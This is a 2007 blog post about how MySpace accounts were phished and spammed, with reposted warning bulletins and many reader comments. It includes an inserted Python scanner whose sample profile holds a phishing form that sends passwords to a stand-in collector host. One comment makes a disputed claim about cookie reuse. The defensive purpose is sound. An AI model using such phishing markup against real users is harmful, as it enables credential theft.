How your Myspace got hacked
Since I’m notifying people whose Myspace profiles got “hacked”, I figured I should put up a more comprehensive post on how it might have happened, and what to do about it.
To recap: Lately a lot of spam has been posted as comments on profiles, and the person who seemingly posted the comment has no idea it’s happening. The typical spam lately has been: iPhone, Macy’s gift card, Victoria’s Secret gift card, Nintendo Wii, penis pills, ringtones, some kind of dating site, porn (one user unwittingly sent out porn bulletins). In the past we’ve seen bulletins sent out by unsuspecting people, hawking Louis Vuitton bags and webcam girls.
First of all, most of the time your profile got hacked because you gave away your password to the bad guys. There are a few ways that normally happens; see below. But first, here’s what you need to do to fix it:
You need to change your password. But that’s not always enough. And here’s why:
Even when you change your password, the bad guys keep sending out stuff in your name.
The reason could be that they placed rogue code inside your profile. Here’s an actual example of that:
http://spamhuntress.com/2007/03/23/anatomy-of-a-hacked-myspace-page/
In other words, you need to clear out the code they left behind in your profile (often in the About me section). That code gets you to “sign in again” at a fake place, which gives them your new password each time you change it. Then change the password again, taking care not to sign in again on a fake site.
Here’s how they got your password in the first place:
1)
Did you click on a link bearing a resemblance to this, and then go through the process?
Well, this guy at one time had a tracker he gave out, but these days the only thing he seems interested in is getting the password to your profile so he can send out his spam. And lots of people do give him their passwords, thinking they’ll get that tracker.
There is no software involved that I know of, so changing your password might be enough. Check your profile to see if there’s any strange code on it, or something got deleted.
2)
Then there’s this thing:
It’s a program, and it downloads automatically once you click on the link under that image. Apparently, it throws up some popups during or after installation that ask for your password. Vitalsecurity tried it (see here and here), and said it didn’t appear to work, but it does spam in your name.
This is software that resides on your local machine. I don’t know if changing your password is enough. We’ll need some feedback from someone who tested it to be sure. But change your password and see if that fixes it. And check your profile for any code added or removed by the bad guys.
3)
The third way is if you receive an e-mail that tricks you into logging into Myspace - only there’s a link in that e-mail going to a fake myspace site.
With this way, changing your password and checking your profile for rogue code should be enough.
4)
Links from bulletins and comments, leading to a fake myspace site. They copy the myspace site, with a lookalike site name. The fake site says you’ve been logged out and need to log in again.
You need to change your password, and check your profile for rogue code.
5)
Well, I don’t know if there is a fourth way. There probably is. But I’ll have to ask for help from the readers on this one. How about that tracking code that supposedly reads the cookies from Myspace if you’re logged in?
Conclusion: The people behind the first two methods do spam in your name, to get more people to give away their passwords. But I don’t know yet who’s responsible for the spam that’s not for the “scam”. If you know exactly how your password got pilfered, and you can show what kind of spam got posted through your profile, please let me know.
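The two checks this post keeps coming back to, "is this really myspace.com?" and "is there rogue code in my About me section?", can be sketched as below. This is an added example, not code from the original post: the flagging rules are assumptions, and the sample markup and the `.example` host names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED = "myspace.com"  # the real site named in the post


def is_real_myspace(url):
    """True only if the URL's host is myspace.com or a subdomain of it."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return host == TRUSTED or host.endswith("." + TRUSTED)


def classify(url):
    """Return 'ok', 'lookalike' or 'offsite' for a URL found in a profile."""
    parts = urlsplit(url)
    if not parts.netloc:
        # Relative links stay on the site; other schemes are not myspace.
        return "ok" if not parts.scheme else "offsite"
    if is_real_myspace(url):
        return "ok"
    # The site name appears somewhere in the authority, but the real host
    # is something else: the "lookalike site name" trick from item 4.
    return "lookalike" if "myspace" in parts.netloc.lower() else "offsite"


class ProfileScanner(HTMLParser):
    """Collects (reason, tag, url) for markup worth a manual look."""

    URL_ATTRS = ("href", "src", "action")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # A password box inside profile text is a "sign in again" prompt.
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.findings.append(("password-field", tag, ""))
        for name in self.URL_ATTRS:
            url = attrs.get(name)
            if not url:
                continue
            verdict = classify(url)
            # Lookalikes are flagged anywhere; ordinary off-site URLs only
            # when a form would submit what you type to them.
            if verdict == "lookalike" or (verdict == "offsite" and tag == "form"):
                self.findings.append((verdict, tag, url))


def scan_profile(html):
    scanner = ProfileScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample of an "About me" section with leftover rogue code.
SAMPLE_ABOUT_ME = """
<p>Hi, welcome to my page!</p>
<a href="http://www.myspace.com/tom">my friend</a>
<a href="/index.cfm?fuseaction=user">home</a>
<a href="http://myspace.com.profile-login.example/index.cfm">log in again</a>
<form action="http://collector.example/save.php" method="post">
  <input type="text" name="email"><input type="password" name="pw">
</form>
"""

if __name__ == "__main__":
    for reason, tag, url in scan_profile(SAMPLE_ABOUT_ME):
        print(reason, tag, url)
```

Anything the scanner reports is a candidate for deletion in safe edit mode before the password is changed again.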
March 19th, 2007 at 4:30 pm
This was posted as a bulletin on Myspace, unknown writer:
how to safely delete the tracker in the comments virus
how to safely delete comments with “profile tracker” ads: these comments/ads are put on your profile by hackers! they infiltrate profiles of your friends and post the ads in comments on your profile. these comments have embedded codes that hide the ‘delete’ feature, and replace it with a gray ‘delete’ box. {or other versions}..but do not click on that box, because it’s a trick to get into your profile!
to remove the comment, go into your homepage, click on ‘edit profile’. then look on the upper right hand page and find…”safe edit mode”! once in that mode, click on “comments”. then you will see the comments in html format, and you can safely delete, as the feature is visible. advice: delete all comments with “profile tracker” ads…good luck!
also, if someone has posted a comment using your profile (a hacker), change your password and email!
please repost this bulletin for all your friends to see!!!
March 19th, 2007 at 4:45 pm
I’m answering my own comment here:
I don’t see any code that shouldn’t be there in those comments. I also haven’t received any of those comments before, so it’s hard to say what happens once you’ve got one. Can anyone confirm or debunk what was in that bulletin?
March 22nd, 2007 at 10:35 am
I just got another bulletin. The content is unconfirmed, and I don’t know who wrote it.
Subject: Got Hacked? -Thanks…They Call Us Devil Dogs
Have you noticed weird bulletins posted by your friends lately? Instead of surveys and games, it looks like they’re advertising ringtones for songs they don’t even like, or telling you to smoke pot when they’re not even a pot smoker?
If so, it probably means their MySpace profile has been stolen, and yours could be next.
Profile thieves are stealing MySpace profiles left and right so they can spam other people, and in some cases, they manage to steal more than just your MySpace.
Here’s how they usually steal it:
They post a message, bulletin, or comment containing a Flash file. It might be disguised as a game, or lately there’s one that says, “Click here if you like to smoke pot.” But in reality, it’s just a trap to steal your MySpace.
Without you realizing it, the Flash file automatically redirects you to a different website where the thief has set up a copycat of the MySpace login page. What it looks like to you is, “Oh, stupid MySpace logged me out again.” And so you enter your username and password, and bingo — they just stole your profile. Since you were on a copycat site, it didn’t log you in. It just stored the email and password you entered in a big file, and now that profile thief is going to use your account to spam people.
But the danger doesn’t end there. The person who stole your profile knows that you can always change your password and lock them out of your account. So now, they try to take over your profile entirely. If they see your email address ends in yahoo.com or hotmail.com, they go to your email login page and try to log in to your email account with the same password. Many people use the same password for their email account and their MySpace profile, and if you’re one of those people, now the thief has access to your email, too.
And check this out — once they have access to your email, they can start sending lost password requests to PayPal, AIM, Yahoo Messenger, eBay, or anywhere else you might have an account, and they can now reset your passwords on other systems, and even change the email address on your MySpace profile to their own address so you can never log in again!
Don’t be fooled into thinking that MySpace will let you back in to your profile once it gets stolen and you can no longer log in.
If this happens, MySpace will ask you to send a digital picture of yourself so they can see if you are pictured in the account that you say was stolen. If the spammer has deleted all of the face pics in your profile (which they usually do), then MySpace won’t do anything at all because you have no way to prove the profile is really yours.
But if they see your picture in the account you say was stolen, MySpace still won’t give you access to the account — they’ll just DELETE IT. And now the spammer can’t use it anymore, but you will have lost all of your messages, photos, and comments and you’ll have to start all over again.
Here’s how you can protect yourself from profile thieves:
1. Change your MySpace password right now. Even if you haven’t seen weird bulletins yet, your account info may have been stolen already and the thief just hasn’t used it yet. They steal thousands of profiles at a time, and yours could be sitting in some spammer’s list just waiting to be hijacked.
2. Change the password to your email address right now. It’s no good just changing your MySpace password, because if they can get into your email account, they can still steal your profile.
3. IMPORTANT: Make sure your new email password and your new MySpace password aren’t the same!
4. Never click on a link in a bulletin, message, or comment that looks suspicious. It’s probably a trap to steal your profile.
5. If it EVER looks like MySpace has logged you out, don’t enter your email and password. Instead, type ‘www.myspace.com’ in the address bar and hit enter to make sure you are still on the real MySpace website and not a copycat site.
6. If you see weird bulletins showing up from your friends, message them right away to tell them their profile has been stolen and advise them to change BOTH their MySpace password and their email account’s password. Most people don’t see the bulletins their account is posting until it’s too late.
7. COPY AND PASTE this whole message into a new bulletin.
Let’s keep profile thieves from stealing our profiles and our friends’ profiles!
March 23rd, 2007 at 5:51 am
Here’s another found in a bulletin today:
Subject: BEWARE OF HACKERS! (thanks unique jewellery)
Have you noticed weird bulletins posted by your friends lately? Instead of surveys and games, it looks like they’re advertising ringtones for songs they don’t even like, or telling you to smoke pot when they’re not even a pot smoker? Or even bulletins that end in numbers for example like “F**k this Bitch!! 25489”
If so, it probably means their MySpace profile has been stolen, and yours could be next.
Profile thieves are stealing MySpace profiles left and right so they can spam other people, and in some cases, they manage to steal more than just your MySpace.
Here’s how they usually steal it:
They post a message, bulletin, or comment containing a Flash file. It might be disguised as a game, or lately there’s one that says, “Click here if you like to smoke pot.” But in reality, it’s just a trap to steal your MySpace.
Without you realizing it, the Flash file automatically redirects you to a different website where the thief has set up a copycat of the MySpace login page. What it looks like to you is, “Oh, stupid MySpace logged me out again.” And so you enter your username and password, and bingo — they just stole your profile. Since you were on a copycat site, it didn’t log you in. It just stored the email and password you entered in a big file, and now that profile thief is going to use your account to spam people.
But the danger doesn’t end there. The person who stole your profile knows that you can always change your password and lock them out of your account. So now, they try to take over your profile entirely. If they see your email address ends in yahoo.com or hotmail.com, they go to your email login page and try to log in to your email account with the same password. Many people use the same password for their email account and their MySpace profile, and if you’re one of those people, now the thief has access to your email, too.
And check this out — once they have access to your email, they can start sending lost password requests to PayPal, AIM, Yahoo Messenger, eBay, or anywhere else you might have an account, and they can now reset your passwords on other systems, and even change the email address on your MySpace profile to their own address so you can never log in again!
**Don’t be fooled into thinking that MySpace will let you back in to your profile once it gets stolen and you can no longer log in.**
If this happens, MySpace will ask you to send a digital picture of yourself so they can see if you are pictured in the account that you say was stolen. If the spammer has deleted all of the face pics in your profile (which they usually do), then MySpace won’t do anything at all because you have no way to prove the profile is really yours.
But if they see your picture in the account you say was stolen, MySpace still won’t give you access to the account — they’ll just DELETE IT. And now the spammer can’t use it anymore, but you will have lost all of your messages, photos, and comments and you’ll have to start all over again.
Here’s how you can protect yourself from profile thieves:
1. Change your MySpace password right now. Even if you haven’t seen weird bulletins yet, your account info may have been stolen already and the thief just hasn’t used it yet. They steal thousands of profiles at a time, and yours could be sitting in some spammer’s list just waiting to be hijacked.
2. Change the password to your email address right now. It’s no good just changing your MySpace password, because if they can get into your email account, they can still steal your profile.
3. IMPORTANT: Make sure your new email password and your new MySpace password aren’t the same!
4. Never click on a link in a bulletin, message, or comment that looks suspicious. It’s probably a trap to steal your profile.
5. If it EVER looks like MySpace has logged you out, don’t enter your email and password. Instead, type ‘www.myspace.com’ in the address bar and hit enter to make sure you are still on the real MySpace website and not a copycat site.
6. If you see weird bulletins showing up from your friends, message them right away to tell them their profile has been stolen and advise them to change BOTH their MySpace password and their email account’s password. Most people don’t see the bulletins their account is posting until it’s too late.
7. COPY AND PASTE this whole message into a new bulletin and let’s keep profile thieves from stealing profiles!
*********** PLEASE REPOST FOR YOUR friends
April 11th, 2007 at 7:44 pm
hey,
my name is chelsea and i just wanted to tell you i have been following this advice and i have never once been phished or hacked.
thank you very much and keep up the wonderful work!
:)
chelsea
April 12th, 2007 at 9:52 am
Watch out for a fat git called Bernard o mahoney. He is constantly hacking into my computer and reading my personal stuff. Oh yeah, and he’s a grass.
April 12th, 2007 at 4:09 pm
Umm Andy?
You sure you haven’t dipped into the grass supply?
April 13th, 2007 at 10:41 am
it has been happening a lot lately - please tell your editor to contact me on my email address provided
April 13th, 2007 at 9:21 pm
Searching $500 gift card myspace on google gives you like 1.5 million profiles.
Some of my friends have this problem. This site really needs to get linked to everywhere throughout myspace
April 19th, 2007 at 2:54 am
I have suddenly been unable to log back into my account on Myspace. The problem is that I changed my password and foolishly did not write it down. I keep trying to go through the password request data to have it sent to my email address. When I submit my address it says that my password was sent to my email address. Well it never shows up in my email. I am wondering if anyone has any suggestions, or knows what could be wrong. Thanks
April 19th, 2007 at 2:56 am
By the way, I have already checked my email account and there are no restrictions as to what I can receive so it is not bouncing the password email away, nor auto-filing into a junk folder.
April 20th, 2007 at 9:06 pm
I am glad I read this today. I was hacked earlier and knew what to look for because I was here earlier this afternoon. The hackers did not have a chance to post anything yet! Thank god. Is there anything we can do like start a class action suit? If so, it would be best to pursue the sites they are referring. There is no way that they are not encouraging this type of behavior. Please contact me by email if you know anything. Thank you.
April 27th, 2007 at 11:28 am
FOR SOME REASON I’M GETTING RESPONSES FROM NIGERIAN SCAMMERS AND I WOULD LIKE IT TO STOP.
June 20th, 2007 at 1:59 am
um hi i am not happy because someone hacked into my myspace. can you plz help me plz get back my myspace
June 26th, 2007 at 7:14 am
My myspace must have been hacked because I can’t log in, and when I used the password retrieval it says that my e-mail is not registered with them. I am very upset about this, but apparently there is nothing that I can do except have myspace shut down my current page.
July 2nd, 2007 at 11:22 pm
I have been phished and i dont know how to fix it someone help. I can login but it tells me at the top that i have been phished but myspace caught it and all i have to do is change my password. so i click on the change password and it wont show the verification code i need to type in. please help
July 3rd, 2007 at 5:48 am
I was phished and fell for the trick, I get on myspace, and I get a message stating I was phished, it asked me to enter my e-mail and password then enter a new one…it wouldn’t work the first 8 hours or so, went to sleep, woke up, tried it again, it let me do it this time, but I notice in my myspace url part of it says “fuseaction=user&MyToken”..that can’t be a good thing…I log out…go back into www.myspace.com ….once I log in, my url states the same thing….help please
July 5th, 2007 at 11:24 am
I appreciate the advice and all, but what if you are unable to log into your myspace at all because your profile has been stolen? I cannot log in at all, and I KNOW I have the correct Username and Password. I need help! How do I get in to delete my profile completely? I don’t like my page and all my info to be out there and then not being able to access it. HELP HELP Please…
l_megar@yahoo.com
L
July 12th, 2007 at 8:06 am
hey.. thanks for the info.. but there’s not even any info about how to get our own myspaces back from those hackers. they’d stole our myspace and we can’t even LOG IN! I wonder how do we change our pw without us in our page? o_o
July 19th, 2007 at 6:50 pm
Alright, even if you do change your password repeatedly, and all that crap, it might be useless anyway, if the hackers/phishers are smart.
MySpace uses a cookie, called “MYUSERINFO”, which basically identifies you as the user. If they got in, and copied that cookie’s information, they can get in any time they want. That code never changes. They don’t even need to know your username and password after they get that cookie information. All they need to do is log in once, and they’ve got your profile for life.
Just goes to show how idiotic Tom is. Storing that sensitive data in a cookie, fsking retard.
August 8th, 2007 at 2:15 pm
thanks for the info… but i have bigger problems… i was trying to log in the day after i changed my password and forgot it. so when i clicked i had forgot my password they sent the wrong one. So now i can get on at all
September 10th, 2007 at 1:28 pm
Jake, myspace cookies become useless once the browser is closed (session ends) if what you are saying was true, you wouldn’t need your own password now would you?
October 6th, 2007 at 11:10 pm
I’ve noticed recently that I’m getting lots of and me as a friend …there’s about 2 pages worth of this..it only happens after I send a message to somebody that’s not on my friends list. my question is, This type of thing common? or is it some sort of hack/spam adding thing..cause it seems a bunch of people try to add me but i also notice non existing accounts try to add me as well is this something i should be concerned about please help.
October 14th, 2007 at 11:29 pm
i have a myspace page and i keep getting spammed by this girl every day who keeps changing her name with her multiple profiles and is harassing me with multiple friend requests MAKE IT STOP!
October 20th, 2007 at 5:17 am
HELP ME I HAVE CHANGED AND CHANGED MY PASSWORD AND THEY STILL GET ON. I DONT KNOW HOW I ALWAYS DELETED MY MESSAGES. COULD IT BE FROM ( REMEMBER MY PASSWORD, DONT REMEMBER IT) PLZ HELP ME I HAVE TRIED EVERYTHING dont send anything to me she will read it
October 22nd, 2007 at 5:38 pm
I got hacked and ‘I’ was sending this link being like “I can’t believe we went to school with this chick” and then posted a link. But the link said it was fake and it was just someone wanting my password, thankfully, but anyways, I was a retard and used my mom’s email on myspace and I don’t think she usually gets emails from myspace because she never said anything, but I just want to cancel my account now because I barely used it, and it said it sent an email to my mom’s account and I know her password so I went on her account but it hasn’t been sent yet and it’s not in her junk folder. Is it just being slow or did the hackers like, change my email? Cause I tried to change my email to my actual email but it said it was sending an email to my mom’s account first. Guh.
November 26th, 2007 at 7:04 pm
my myspace got hacked and the computer blew up.
what should i do?
November 27th, 2007 at 6:15 am
To nal_rA:
Maybe you should try that comment somewhere people don’t actually know anything about computers and might believe you?
December 14th, 2007 at 4:55 am
Hello, a friend of mine, her profile has gotten hacked. I’ve tried to help her in telling her to change her password and viewing her profile in safe mode to see if there are any hidden codes. Her myspace page was hacked a while back and she had the bulletins being posted and advertising the Macy’s card and such. She changed her password, and deleted all information in her about me section and profile she says, and she isn’t able to send messages at all or comments and her profile says she has been deleted but it still lets her log in. She can only post bulletins
December 14th, 2007 at 5:58 am
Hi N.’s
The reason she can’t send messages or comments is precisely because her comment was hacked. It’s been blocked from sending stuff by Myspace. Contact Myspace for her and tell them that she’s done all she can to reclaim the profile, and could they please unblock it.
December 23rd, 2007 at 12:15 am
I WAS HACKED ON MYSPACE AND MY ACCOUNT IS STILL THERE AND I CANT GET IT BACK FROM MYSPACE AND WHOEVER HACKED ME CHANGED MY E-MAIL IS THERE ANY WAY I COULD GET IT BACK
December 26th, 2007 at 10:46 pm
my myspace was phished and when i click the link that says change password and secure your account, it just signs me out, do you know a way around that? Please and thanx
February 1st, 2008 at 7:15 pm
hey everytime i try to log into myspace it just keeps saying that “you must be logged in to do that” and just keeps refreshing the page with “you must be logged in to do that”
please help
thankyou
February 25th, 2008 at 1:10 pm
thanks i really need that i have been hacked so many times and when someone request u and it says accept and deny and spam what do they mean by spam i need help plz thanks
DESi